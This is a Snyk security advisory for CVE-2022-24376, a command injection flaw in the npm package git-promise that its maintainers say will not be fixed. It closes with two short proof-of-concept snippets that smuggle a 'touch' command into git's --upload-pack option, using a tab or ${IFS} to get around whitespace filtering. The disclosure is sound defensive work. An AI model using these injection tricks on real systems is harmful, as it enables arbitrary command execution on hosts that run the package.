Command Injection Affecting git-promise Open this link in a new tab package, versions *
Attack Complexity
Low
Privileges Required
High
Confidentiality
High
Integrity
High
Availability
High
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications-
snyk-id
SNYK-JS-GITPROMISE-2434310
-
published
8 Jun 2022
-
disclosed
28 Mar 2022
-
credit
Liran Tal
Introduced: 28 Mar 2022
CVE-2022-24376 Open this link in a new tabHow to fix?
There is no fixed version for git-promise
.
Overview
git-promise is a Simple wrapper that allows you to run any git command using a more intuitive syntax.
Affected versions of this package are vulnerable to Command Injection due to an inappropriate fix of a prior vulnerability in this package. Note: Please note that the vulnerability will not be fixed. The README file was updated with a warning regarding this issue.
PoC 1
const git = require("git-promise");
// Use tab instead of spaces to separate between the touch command and its argument
git("fetch origin --upload-pack=touch /tmp/abcd", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))
PoC 2
const git = require("git-promise");
// Use the shell's predefined separator using ${IFS} to escape the whitespace splitting logic
git("fetch origin --upload-pack=touch${IFS}/tmp/abcd-new", {cwd: '/tmp/example-git-repo'}).then((output) => console.log(output))